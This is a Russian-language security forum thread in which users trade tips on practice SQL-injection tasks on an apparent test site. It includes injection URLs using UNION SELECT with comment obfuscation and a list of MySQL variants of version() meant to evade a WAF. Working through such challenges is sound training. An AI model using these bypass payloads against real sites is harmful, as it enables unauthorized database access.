ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.02.2017, 22:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
403
Репутация:
0
|
|
version() фильтруется WAFом хостинга?
|
|
|
|
17.02.2017, 11:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
3550
Репутация:
0
|
|
Доброго времени суток.
Может,кто подскажет как пробросить в первом задание version().
Синонемы функции блочит.(left,right and etc)
Различные комбинации с обфусикацие тоже.
Через Hexлишь в таблицу добавляет заhex-ое слово.
Ы.З В каком направление капать. Во втором задание все прекрасно проходит.
Ы.Ы.З Может и туплю, но хотелось бы получить хинт.
|
|
|
|
17.02.2017, 18:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
28741
Репутация:
12
|
|
Сообщение от cMs
cMs said:
↑
Доброго времени суток.
Может,кто подскажет как пробросить в первом задание version().
Синонемы функции блочит.(left,right and etc)
Различные комбинации с обфусикацие тоже.
Через
Hex
лишь в таблицу добавляет заhex-ое слово.
Ы.З В каком направление капать. Во втором задание все прекрасно проходит.
Ы.Ы.З Может и туплю, но хотелось бы получить хинт. Странно, это блочит WAF хостинга, а не самого задания...
|
|
|
|
17.02.2017, 19:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
так и чего waf помучать)?
раз уж репа все равно не выдаётся за таски
Код:
Code:
http://test.test-me.pp.ru/url1/inj_test.php?username=admin%27union+select+1,2,3,version/**/()%23
|
|
|
|
18.02.2017, 00:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
3550
Репутация:
0
|
|
Сообщение от t0ma5
t0ma5 said:
↑
так и чего waf помучать)?
раз уж репа все равно не выдаётся за таски
Код:
Code:
http://test.test-me.pp.ru/url1/inj_test.php?username=admin%27union+select+1,2,3,version/**/()%23
WAF всеравно это фильтрует.Таким образом с самого начала пытался(кроме %23).Что бы прокинуть саму скуль для первого задания пришлось юзать такую конструкцию:
Код:
Code:
http://test.test-me.pp.ru/url1/inj_test.php?username=admin%27/*union*/union/*select*/select%201,2,3,4%20--%20
Не знаю, может проблема у меня, но тестовая площадка порой введет себя странно. Запрос вашего ввида у меня вначале не проходил. Я не понимал в чем проблема, но WAF уже тогда блочил union,select и т.п.А через пару дней после уже использования своей конструкции, решил еще разок закинуть простой ввид, который не должен был пахать,он сработал, что удивило меня.
Ы.З Вопрос все еще открыт. Версия так же не заходит.
Ы.Ы.З В третьем и 4, по сути тоже должен быть один запрос с некоторой поравкой на xss, но сама скуля(без внедреняя еще xss),что пашет на 3, не пашет на 4.
Ы.Ы.Ы.З полные ответы думаю стоит стереть после ответа на воп, иначе не будет интереса.
Спасибо за отклик.
|
|
|
|
18.02.2017, 01:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
187765
Репутация:
154
|
|
Сообщение от t0ma5
t0ma5 said:
↑
так и чего waf помучать)?
раз уж репа все равно не выдаётся за таски
Код:
Code:
http://test.test-me.pp.ru/url1/inj_test.php?username=admin%27union+select+1,2,3,version/**/()%23
Всё равно моё мнение не надо вот так сливать таски. Хинтом помочь, да. А открыто постить решение лишает фана проходящих сие таски.
|
|
|
|
20.02.2017, 22:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от SooLFaa
SooLFaa said:
↑
Всё равно моё мнение не надо вот так сливать таски. Хинтом помочь, да. А открыто постить решение лишает фана проходящих сие таски. ой всё, первый вектор, первого таска
кому интересно ещё валидные конструкции для селекта версии
Код:
Code:
select version/*!()*/;
select version/*!(*//*!)*/;
select version ();
select version ( );
select version(/*hm*/);
select version
-> (
-> );
select @@version;
select 0+version()+0;
select{MySqL_d_bSeLect/*!version*//*!()*/}/*:D*/;
select version()zzz; /*хмм*/
хехе кстати сейчас waf жестко валит запрос на слове version после словосочетаний union+select, кто раскрутит через union+select )? один рабочий вектор точно есть
|
|
|
|
21.02.2017, 02:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
3550
Репутация:
0
|
|
Сообщение от t0ma5
t0ma5 said:
↑
ой всё, первый вектор, первого таска
кому интересно ещё валидные конструкции для селекта версии
Код:
Code:
select version/*!()*/;
select version/*!(*//*!)*/;
select version ();
select version ( );
select version(/*hm*/);
select version
-> (
-> );
select @@version;
select 0+version()+0;
select{MySqL_d_bSeLect/*!version*//*!()*/}/*:D*/;
select version()zzz; /*хмм*/
хехе кстати сейчас waf жестко валит запрос на слове version после словосочетаний union+select, кто раскрутит через union+select )? один рабочий вектор точно есть Как раз вопрос в этом и был, как прокинуть version() в union+select.
Само слово подчистую фильтрует, другие функции по типу left(), тоже не проходят(unhex,0x).
Направление подкиньте.
|
|
|
|
21.02.2017, 13:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
187765
Репутация:
154
|
|
Сообщение от cMs
cMs said:
↑
Как раз вопрос в этом и был, как прокинуть version() в union+select.
Само слово подчистую фильтрует, другие функции по типу left(), тоже не проходят(unhex,0x).
Направление подкиньте. Комментарии.
|
|
|
|
21.02.2017, 14:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от cMs
cMs said:
↑
Как раз вопрос в этом и был, как прокинуть version() в union+select.
Само слово подчистую фильтрует, другие функции по типу left(), тоже не проходят(unhex,0x).
Направление подкиньте. юзать переменные
Сообщение от SooLFaa
SooLFaa said:
↑
Комментарии. неа, уже не работает так
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
